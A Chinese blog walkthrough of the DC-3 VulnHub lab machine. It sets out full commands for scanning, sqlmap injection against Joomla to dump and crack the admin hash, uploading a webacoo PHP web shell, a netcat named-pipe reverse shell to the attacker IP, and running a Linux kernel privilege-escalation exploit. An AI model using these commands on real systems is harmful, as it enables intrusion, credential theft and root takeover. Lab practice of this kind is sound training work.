Neos的渗透测试靶机练习——DC-3

简介: Neos的渗透测试靶机练习——DC-3

DC-3
一、实验环境
二、开始渗透

  1. 搜集信息
  2. sqlmap
  3. 上传PHP木马
    三、总结
    一、实验环境
    虚拟机软件:VirtualBox
    攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
    靶机:DC-3(网卡初始为仅主机模式,要有安全意识)
    1
    2
    3
    二、开始渗透
  4. 搜集信息
    输入sudo su,将kali切换到root权限;

输入ifconfig查询自身ip,即攻击机ip;

可以看到自身ip为192.168.56.101,对应的网卡名称为eth0。
本次渗透我们选择输入netdiscover -i eth0扫描本网段存活主机,即靶机ip地址。

可以看到靶机ip为192.168.56.106,。
输入nmap -sV -p- 192.168.56.106,查看靶机端口开放信息。

看到只开放了一个80端口,即http服务。
浏览器输入192.168.56.106:80。

命令行输入whatweb -v 192.168.56.106查询网站指纹信息。

可以看到一些关键信息,其中Joomla是一个基于PHP的内容管理系统(CMS)。

  1. sqlmap
    至此,基本思路为扫目录,查找有没有后台登陆界面。
    有一个针对Joomla的目录扫描工具-Joomscan。
    命令行输入joomscan --url 192.168.56.106。

发现Joomla版本号和一个admin页面,http://192.168.56.106/administrator/,浏览器打开。

基本思路是看看有没有sql注入或Joomla版本漏洞,作为一个脚本小子,根本没精力自己注入好吧,searchsploit扫起来。

cat看看这个42033.txt的内容。

这里exp教我们使用sqlmap进行sql注入。
命令行输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

可以看到爆破出来了几个数据库,这里我们瞄准joomladb,继续爆破表名。输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

出来了一长串,我们看到下方有#_users表,应该跟用户信息有关,针对该表,爆破属性名。
输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

爆破出来了几个属性名,瞄准name,username,password,继续爆破。
输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,username,password --dump -p list[fullordering]

爆破出来了用户名admin和一长串的加密密码。
将加密字符串写入一个pswd.txt文件中。并输入john pswd.txt进行解密。
得解密密码为snoopy,重新登陆后台。

  1. 上传PHP木马
    发现Templates版块中可以编辑PHP文件,可上传PHP木马。
    我这里使用Webacoo生成PHP木马
    命令行输入webacoo -g -o test1.php,将test1.php中的内容上传,文件名为shell.php中并保存,注意格式。

命令行输入webacoo -t -u http://192.168.56.106/templates/beez3/shell.php成功连接后台。

发现自己是www-data用户,linux版本为4.0.21,Ubuntu为16.04。

攻击机输入nc -lvvp 4444监听4444号端口,
靶机输入rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 4444 >/tmp/f,反弹shell。
输入searchsploit Ubuntu 16.04,选则39772.txt进行提权。

输入cat /usr/share/exploitdb/exploits/linux/local/39772.txt,其中给出了exp的下载地址。

此时注意,将网卡设置为网络地址转换NAT模式,命令行输入wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip,将该压缩包下载到本地,然后将网卡调回到仅主机模式。

将该压缩包传到靶机上,攻击机命令行输入python -m http.server 8080
靶机命令行输入 wget http://192.168.56.101:8080/39772.zip。

靶机中输入unzip 39772.zip,解压该压缩包。

输入tar-xvf exploit.tar解压其中的exploit.tar。

进入ebpf_mapfd_doubleput_exploit目录,运行之中的compile.sh文件和doubleput.c文件。

至此,我们得到了root权限,root目录获得最终flag。

至此,渗透结束。
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/qq_38678845/article/details/135453379

目录
相关文章
|
4月前
|
SQL 安全 Shell
vulnhub靶机实战_DC-3
本文介绍DC-3靶机渗透测试全过程,涵盖环境搭建、信息扫描、SQL注入、权限提升等环节。通过Joomla漏洞获取管理员密码,上传木马并提权至root,最终获取flag,是一套完整的渗透实战流程。
1092 1
|
4月前
|
SQL Shell 网络安全
vulnhub靶机实战_DC-8
本文介绍DC-8靶机渗透全过程,涵盖环境搭建、信息扫描、SQL注入、密码爆破、反向Shell获取及提权。利用sqlmap与john工具破解用户凭据,通过Web表单执行命令并获取root权限,最终读取flag完成渗透测试。
478 0
|
4月前
|
关系型数据库 MySQL 网络安全
vulnhub靶机实战_DC-7
本文介绍DC-7靶机渗透测试全过程,包括靶机下载、VMware导入、网络配置、Nmap扫描发现开放80和22端口,通过信息搜集获取数据库凭证,尝试登录SSH成功,获得系统访问权限。适合网络安全学习者实践渗透流程。
199 0
|
4月前
|
中间件 测试技术 应用服务中间件
vulnhub靶机实战_DC-5
本教程介绍如何下载并配置DC-5靶机进行安全测试。内容包括靶机下载链接、VMware导入步骤、网络设置及Nmap扫描分析,帮助快速搭建渗透测试环境。
274 0
|
4月前
|
存储 安全 Shell
vulnhub靶机实战_DC-4
本文介绍了DC-4靶机渗透测试的完整过程,包括靶机下载、环境搭建、信息扫描、漏洞利用、提权以及最终获取flag的详细步骤。通过使用工具如nmap、Hydra进行端口扫描与密码爆破,结合反向Shell与teehee命令实现权限提升,最终成功获取系统flag。内容详实,适合网络安全学习与实践。
636 0
vulnhub靶机实战_DC-4
|
4月前
|
安全 网络安全 开发工具
vulnhub靶机实战_DC-2
本文介绍了DC-2靶机的渗透测试实战过程,涵盖靶机下载、环境搭建、信息扫描、漏洞利用、权限提升及最终提权获取flag的完整流程。内容包括使用nmap扫描、WPScan和Hydra工具爆破登录信息,绕过rbash限制,利用git提权等关键技术步骤。
235 0
|
4月前
|
安全 网络安全 数据库
vulnhub靶机实战_DC-1
本实验通过启动靶机、扫描漏洞、攻击Drupal服务、获取数据库权限、提权至root,最终成功获取所有flag,完成渗透测试目标。
332 0
vulnhub靶机实战_DC-1
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
282 4
|
12月前
|
数据可视化 前端开发 测试技术
接口测试新选择:Postman替代方案全解析
在软件开发中,接口测试工具至关重要。Postman长期占据主导地位,但随着国产工具的崛起,越来越多开发者转向更适合中国市场的替代方案——Apifox。它不仅支持中英文切换、完全免费不限人数,还具备强大的可视化操作、自动生成文档和API调试功能,极大简化了开发流程。
|
7月前
|
Java 测试技术 容器
Jmeter工具使用:HTTP接口性能测试实战
希望这篇文章能够帮助你初步理解如何使用JMeter进行HTTP接口性能测试,有兴趣的话,你可以研究更多关于JMeter的内容。记住,只有理解并掌握了这些工具,你才能充分利用它们发挥其应有的价值。+
1108 23